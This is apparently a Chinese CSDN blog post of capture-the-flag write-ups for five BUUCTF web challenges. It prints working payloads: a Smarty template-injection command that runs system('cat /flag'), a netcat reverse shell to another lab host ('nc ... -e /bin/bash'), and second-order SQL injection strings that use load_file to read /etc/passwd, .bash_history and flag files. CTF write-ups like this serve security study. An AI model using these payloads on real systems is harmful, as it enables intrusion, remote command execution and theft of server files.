BUUCTF__web题解合集(十)

最新推荐文章于 2024-05-16 12:04:10 发布
最新推荐文章于 2024-05-16 12:04:10 发布
阅读量1.6k 收藏 5
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/TM_1024/article/details/108761112
版权

前言

  • 真的无所谓吗???

题目

1、[CISCN2019 华东南赛区]Web11

  • 首先很明显的ssti模板注入,注入点在xff头,加上X-Forwarded-For:127.0.0.1后,右上角的ip会变化,输入{{2*2}}时回显是 4,
  • 然后第二步就是确认模板选择注入payload。底部给出提示。为smarty模板,可以找到相关资料
    在这里插入图片描述
  • 已知能执行 {if }{/if}标签,比如执行 phpinfo() ,可以用{if phpinfo()}{/if}
  • 找到flag环境变量提示flag不在这里,就可能是有包含flag的文件。执行系统函数{if system('cat /flag')}{/if}成功得到flag,不过在注释里。做题时还以为执行失败了。。。
  • 两点,第一点找到为ssti模板注入,并且确定为smarty模板。第二点就是执行正确的payload找到flag。
  • 应该算基础的ssti注入,连过滤都没有。

2、[BJDCTF 2nd]Schrödinger

  • 这应该算是脑洞题吧,页面全选或者查看源代码能有提示
    在这里插入图片描述
  • 尝试访问的话有一个登录页面,尝试sql注入无果。
  • 返回继续看。提示你删除test.php。在cheak时抓包,发现cookie 中存在两个参数,有一个dXNlcg参数,后面的值能base64解密后发现为时间戳。随便修改后比如说1就弹出一个av号,b站搜av号就能找到flag。
    在这里插入图片描述
  • 感觉就是脑洞题。

3、[BJDCTF 2nd]duangShell

  • 首先第一步提示了.swp源码泄露,访问/.index.php.swp下载文件,在linux下执行命令vim -r index.php.swp恢复文件得到源代码。因为.swp文件产生的原因就是vim编辑文件时的异常退出。

  • 然后考点是命令执行,存在过滤,无法直接读取flag文件。第二步就是弹shell

  • 关于弹shell,可以利用nc反弹shell。因为buu不出外网,开一小号在Basic分类中开一台Linux Labs。根据提示ssh连上。然后ifconfig查看内网地址
    在这里插入图片描述

  • 图中第一个174.1.80.221就是内网地址,然后在这台主机上监听一个端口,nc -lvvp 4455

  • 然后在题目中post传参nc另一台主机的内网地址就成功连上

    girl_friend=nc 174.1.80.221 4455 -e /bin/bash

在这里插入图片描述

  • 再执行cat /flag发现无回显,执行find / -name / flag找到flag所在位置,然后再cat 一下就行。
    在这里插入图片描述
  • 总结就是第一次接触反弹shell ,第一步源码泄露是常见的源码泄露的类型。注意点就是应该 nc 主机的内网地址。

4、[BSidesCF 2019]Futurella

  • F12出flag应该没有更简单的web题了吧。

5、[网鼎杯 2018]Comment

  • 首先,第一步.git源码泄露和恢复。很多工具都能得到源码文件,但因为源码不全需要利用.git目录恢复历史版本,而我用其它的工具GitHackGitHackerscrabble都没有成功恢复到.git目录。最后用之前做题时下载的一个GitHack改进版成功得到,但是我找不到原下载的地址了,就先上传到CSDN吧。卡了好久这里。
  • 恢复源代码,先恢复文件python GitHack.py url
  • 查看历史操作记录 git log --reflog
  • 版本恢复 git reset --hard commit
    在这里插入图片描述
  • 得到源代码
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>
  • 接下来是第二步,代码审计。第一点就是对于addslashes函数的转义过滤而言,在写入数据库时,不会讲增加的转义符\ 写入,比如说,单引号经过函数处理应该是\',写入时,还是'
    在这里插入图片描述
  • 同时,在本题中可以发现,category读取时没有经过函数处理直接填入sql语句,而在上面的输入就经过了函数处理。所以,当我们输入'111时,最后写入数据库还是'111,但在执行写入的sql语句时是被转义的\'111在,最终在读取时直接填入sql语句就能闭合前面的单引号,引发注入。
    在这里插入图片描述
  • 然后思考怎么来利用,因为有留言版相关内容都有回显,所以最好的方法就是让它回显我们需要的内容。
  • 第三步,二次注入。 利用多行注释/**/将后面输入的content注释掉,而在category存储时写入一个我们想要的content
  • 例如当我们的category=' ,content = database(),/*,在评论里提交*/#时,就能讲原有的content注释掉,而让content的值为数据库名称。#的作用是将后面的逗号注释,变灰部分就是注释。
    在这里插入图片描述
  • 留言前需要先登录,给出了账号,密码还缺少后面的三位,可以写个脚本爆破,或者盲猜666。

在这里插入图片描述

  • 继续尝试读表、字段。内容发现没有flag。

    ' ,content =(select group_concat(table_name) from information_schema.tables where table_schema=database()) ,/*

  • 最后通过user()可以得知服务是以 root 权限运行的,可以用load_file函数读取文件,最常见的etc/passwd文件。
    在这里插入图片描述

  • 能发现文件路径web服务路径。然后然后,可以读取.bash_history它是什么,它存储了当前用户输入过的历史命令。通过读取它来发现隐藏的文件。。。

    ', content=load_file('/home/www/.bash_history'),/*

在这里插入图片描述

  • 整理一下就是以下步骤

    cd /tmp/                   到 /tmp/目录下
unzip html.zip             解压html.zip
 rm -f html.zip            删除html.zip
 cp -r html /var/www/      复制文件夹html 到 /var/www/目录下
 cd /var/www/html/          到 /var/www/目录下
 rm -f .DS_Store            删除 .DS_Store文件
 service apache2 start     重启apache2服务

  • 然后可以发现/tmp/html目录中.DS_Store原文件没被删除,它只删除了复制过去后的文件,而.DS_Store文件是Mac OS 操作系统所创造的隐藏文件,目的在于存贮目录的自定义属性,可能存放着其它文件。所以尝试读取它。直接读读不出来,那就加一个hex让它以16进制输出。

    ',content=(select hex(load_file('/tmp/html/.Ds_Store'))),/*

  • 可以得到一长串的16进制字符,将它转为ASCII字符,可以用WinHex新建一个文件,然后把16进制文件以ASCII Hex格式写入。
    在这里插入图片描述

  • 可以得到flag文件名
    在这里插入图片描述

  • 然后再去读取它,但是在原目录/tmp/html下读取的flag文件是假的。真正的flag文件在复制后的路径/var/www/html,并且flag在注释里,当然也可以像上面一样加一个hex让它以16进制字符串显示。

    ', content=(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php')),/*

在这里插入图片描述

  • 结束,可以说是很复杂的题目了。。。第一步我就没了。。。后面的审计和实际注入也想不到。只能实际复现+理解了。

最后

  • 可能不是写的很清楚,如果有疑问的话,欢迎留言一起交流。
风过江南乱
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
完成ubuntu-ctf靶机渗透 最终提权得到shell权限
m0_60319766的博客
02-17 4194
完成ubuntu-ctf靶机渗透 最终提权得到shell权限
[CTF]反弹shell总结
cosmoslin的博客
11-11 4309
1 什么是反弹shell reverse shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 2 为什么要反弹shell 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。
Buuctf Web题解
最新发布
2401_84968557的博客
05-16 363
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适小白学习的零基础资料,也有适3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
gcc/g++ 编译、链接与常用命令工具(1)
mijichui2153的博客
04-05 5404
参见:https://blog.csdn.net/surgewong/article/details/39236707
BUUCTF的Web真题学习整理(一)
CTF小白的博客
08-01 5058
目录WEB1—WarmUp (任意文件包含漏洞)WEB2—高明的黑客(fuzz脚本)WEB3—easy_tornado (服务端模板注入(ssti攻击))WEB4—Hack World(时间盲注)WEB5—admin(unicode欺骗)WEB6—piapiapia (一个源码中有防止sql注入的反序列化漏洞) BUU上的题基本都是比赛真题,还是很有借鉴意义的,安利一波https://buuoj...
Linux configure命令详解
JAVA技术
08-12 611
[code="java"]–cache-file=FILE[/code] ’configure’会在你的系统上测试存在的特性(或者bug!).为了加速随后进行的配置,测试的结果会存储在一个cache file里.当configure一个每个子树里都有’configure’脚本的复杂的源码树时,一个很好的cache file的存在会有很大帮助. [code="java"] –he...
configure检测依赖项的一个问题
星空的专栏
02-25 1126
最近更改一个函数库里面的函数定义和宏定义等的名字,发现另外一个依赖此库的程序configure无法检测到依赖项 查了半天才发现configure检测依赖的实现方法,好像是写了个小程序,调用库关键的某个定义, CPPFLAGS="${CPPFLAGS} ${ABC_HALF_FULL_INCLUDE}"         cat >conftest.$ac_ext  /* confdefs.
acm.rar_浙江大学 ACM 题解
09-24
【标题】"acm.rar_浙江大学 ACM 题解" 涵盖的是关于浙江大学在ACM(国际大学生程序设计竞赛)方面的训练资料和解题思路。这些资源通常包括历年的竞赛题目、官方解答以及参赛者们分享的解题策略,旨在帮助学习者提升...
leetcode题解_leetcode_leetcode题解_
09-29
《LeetCode题解》是广大程序员提升算法能力和解决实际编程问题的重要资源库。它涵盖了大量来自LeetCode在线编程挑战平台的题目,旨在帮助开发者提升在算法、数据结构以及问题解决能力上的技能。LeetCode题解通常包括...
acm.rar_oj题目含题解_明代zjuoj
09-24
【标题】"acm.rar_oj题目含题解_明代zjuoj" 指的是一份关于ACM(国际大学生程序设计竞赛)的压缩包资源,特别关注在线判题系统(Online Judge,简称OJ)中的题目及其解题思路。这个资源主要面向大学阶段参与ACM竞赛...
acm.tar.gz_zoj_zoj题解_题目分类
09-21
《浙江大学ZOJ源码题解:题目类型与难易度分类》 浙江大学ZOJ(Zhejiang University Online Judge)是一个著名的在线编程竞赛平台,为广大学习计算机科学和技术的同学们提供了丰富的编程题目和实践机会。这个名为...
Leetcode 5个经典元素和问题题解_leetcode_leetcode题解_
10-01
本资源包含五个经典的LeetCode问题及其题解,这些题目涵盖了不同的算法类型,是学习和复习编程基础的宝贵资料。下面将详细阐述每个题目及其解题策略。 1. **2Sum (1)**: 这是LeetCode中的经典问题,标签为 "数组" ...
CISCN2023 unzip软链接getshell
夜未至
06-19 1946
使用CISCN2023的web题的unzip来演示压缩包的getshell
[BUUCTF][蓝帽杯 2021]One Pointer PHP
cosmoslin的博客
11-15 1694
考点 PHP数组溢出 绕过open_basedir 攻击php-fpm绕过disable functions Suid提权 源码 user.php <?php class User{ public $count; } ?> add_api.php <?php include "user.php"; if($user=unserialize($_COOKIE["data"])){ $count[++$user->count]=1; if($count[]=1){ $user
2023ciscn初赛 Unzip
2202_75317918的博客
06-16 1076
2023ciscn初赛 Unzip
[CTF]-反弹shell[2]
Mr.木Mu
05-27 1581
[二]反弹shell的本质开放端口(腾讯云,宝塔面板)什么是反弹shell反弹shell的本质是什么bash -i/dev/tcp/ip/port实例1:实例2:交互重定向>&、&>常见的反弹shell 的语句怎么理解1234结束极客大挑战where_is_my_FUMO 开放端口(腾讯云,宝塔面板) 测试反弹shell 需要保证端口开放 打开腾讯云 --> 打开安全组 --> 添加规则 添加入站规则 完成之后–> 一键放通 然后进入宝塔面板
【网络安全】记一次红队渗透实战项目_渗透测试红队
wangluoanquan111的博客
06-16 1198
信息收集非常重要,有了信息才能知道下一步该如何进行,接下来将用 nmap 来演示信息收集。
[CISCN2023]unzip
leekos的博客,分享web安全相关知识~
05-28 966
目录的话,我们就可以通过该文件直接访问网站的目录了,然后我们将。刚好解压到网站的访问目录,此时我们可以直接使用蚁剑连接了。然后使用zip命令将其压缩为:zip.zip。上传,发现shell.php成功上传到。重点来了,由于之前我们上传了一个软链接。所以会恰好将shell.php解压到。上传成功,然后就可以getshell了。软连接的作用类似于win下的快捷方式。可知,需要使用linux中的。shell.php为一句话木马。首先使用命令创建软链接:web。,上传上去,这样就会在。假如我们使用软链接生成。
[BJDCTF 2nd]duangShell(反弹shell,swp泄露)
xlcvv的博客
04-28 1572
进入题目: swp文件,我第一次做CTF的时候就是swp泄露:[2019EIS高校运维赛]ezupload swp文件: 非正常关闭vi/vim编辑器时会生成一个.swp文件 关于swp文件 使用vi/vim,经常可以看到swp这个文件,那这个文件是怎么产生的呢,当你打开一个文件,vi就会生成这么一个.(filename)swp文件 以备不测(不测下面讨论),如果你正常退出,那么这个这个sw...
buuctfmisc题解wireshark
04-10
buuctfmisc是一个CTF比赛中的题目,涉及到网络分析工具Wireshark的使用。Wireshark是一款开源的网络协议分析工具,可以用于捕获和分析网络数据包。在buuctfmisc题目中,可能需要使用Wireshark来解析和分析给定的网络数据包,以获取关键信息或者解决问题。 具体的题解步骤可能因题目而异,但通常的解题思路如下: 1. 下载并安装Wireshark:首先需要从Wireshark官网下载并安装适你操作系统的版本。 2. 打开Wireshark并开始捕获数据包:打开Wireshark后,选择适的网络接口开始捕获数据包。可以通过点击"Capture"按钮或者使用快捷键Ctrl + E来开始捕获。 3. 分析捕获的数据包:Wireshark会将捕获到的数据包以列表形式展示出来。你可以通过点击每个数据包来查看其详细信息,包括源IP地址、目标IP地址、协议类型等。 4. 过滤数据包:如果题目要求只关注特定的数据包,你可以使用Wireshark提供的过滤功能来筛选出符条件的数据包。过滤条件可以根据协议、源IP地址、目标IP地址等进行设置。 5. 提取关键信息:根据题目要求,你可能需要从数据包中提取关键信息。Wireshark提供了多种功能来帮助你提取数据,比如导出数据包、导出特定协议的数据等。 6. 分析数据包内容:根据题目要求,你可能需要进一步分析数据包的内容。Wireshark可以解析多种协议,你可以查看每个数据包的协议栈、协议字段等信息。 7. 解决问题或回答题目:根据你对数据包的分析和提取的关键信息,你可以解决问题或者回答题目。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值